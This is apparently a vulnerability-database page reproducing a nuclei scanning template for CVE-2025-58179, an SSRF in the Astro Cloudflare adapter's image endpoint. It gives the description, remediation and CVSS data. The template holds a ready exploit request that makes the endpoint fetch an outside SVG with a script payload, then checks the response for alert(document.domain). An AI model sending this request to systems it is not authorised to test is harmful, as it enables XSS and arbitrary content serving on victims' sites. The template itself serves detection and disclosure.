Lucene search
K

Astro Cloudflare Adapter - Server Side Request Forgery

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

SSRF in Astro Cloudflare adapter 11.0.3–12.6.5 allows unauthorized content when output is server.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-41321
24 Apr 202617:04
attackerkb
Circl
CVE-2025-58179
4 Sep 202517:28
circl
CNNVD
Astro 代码问题漏洞
5 Sep 202500:00
cnnvd
CVE
CVE-2025-58179
4 Sep 202523:36
cve
Cvelist
CVE-2025-58179 Astro Cloudflare adapter is vulnerable to Server-Side Request Forgery via /_image endpoint
4 Sep 202523:36
cvelist
EUVD
EUVD-2025-26878
3 Oct 202520:07
euvd
EUVD
EUVD-2025-36542
28 Oct 202519:54
euvd
EUVD
EUVD-2026-25579
24 Apr 202617:04
euvd
Github Security Blog
Server-Side Request Forgery via /_image endpoint in Astro Cloudflare adapter
4 Sep 202519:24
github
NVD
CVE-2025-58179
5 Sep 202500:15
nvd
Rows per page
id: CVE-2025-58179

info:
  name: Astro Cloudflare Adapter - Server Side Request Forgery
  author: HoangAnhThai
  severity: high
  description: |
    Astro is a web framework for content-driven websites. Versions 11.0.3 through 12.6.5 are vulnerable to SSRF when using Astro's Cloudflare adapter. When configured with output: 'server' while using the default imageService: 'compile', the generated image optimization endpoint doesn't check the URLs it receives, allowing content from unauthorized third-party domains to be served. a A bug in impacted versions of the @astrojs/cloudflare adapter for deployment on Cloudflare’s infrastructure, allows an attacker to bypass the third-party domain restrictions and serve any content from the vulnerable origin.
  impact: |
    Unauthenticated attackers can bypass third-party domain restrictions to serve arbitrary content from unauthorized domains through the image optimization endpoint, potentially enabling XSS attacks.
  remediation: |
    Upgrade Astro's @astrojs/cloudflare adapter to version 12.6.6 or later that properly validates image URLs.
  reference:
    - https://github.com/withastro/astro/commit/9ecf359
    - https://github.com/advisories/GHSA-qpr4-c339-7vq8
    - https://nvd.nist.gov/vuln/detail/CVE-2025-58179
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2025-58179
    epss-score: 0.00773
    epss-percentile: 0.5125
    cwe-id: CWE-918
    cpe: cpe:2.3:a:withastro:astro:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: withastro
    product: astro
  tags: cve,cve2025,ssrf,xss,astro,cloudflare,vuln,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/_image?href=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script type="text/javascript'
          - 'alert(document.domain);'
        condition: and

      - type: word
        part: content_type
        words:
          - "image/svg+xml"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e3e0ddcb2be7d0ef8bcff49713e0dbf22b67dad07e2bc6ad690645932122703a022035cebff5db856075f0c08c2c7b4f569a6664fe3ec6fdca67aef8f4bf6d6e89ac:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.16.5 - 7.2
EPSS0.00773
SSVC
17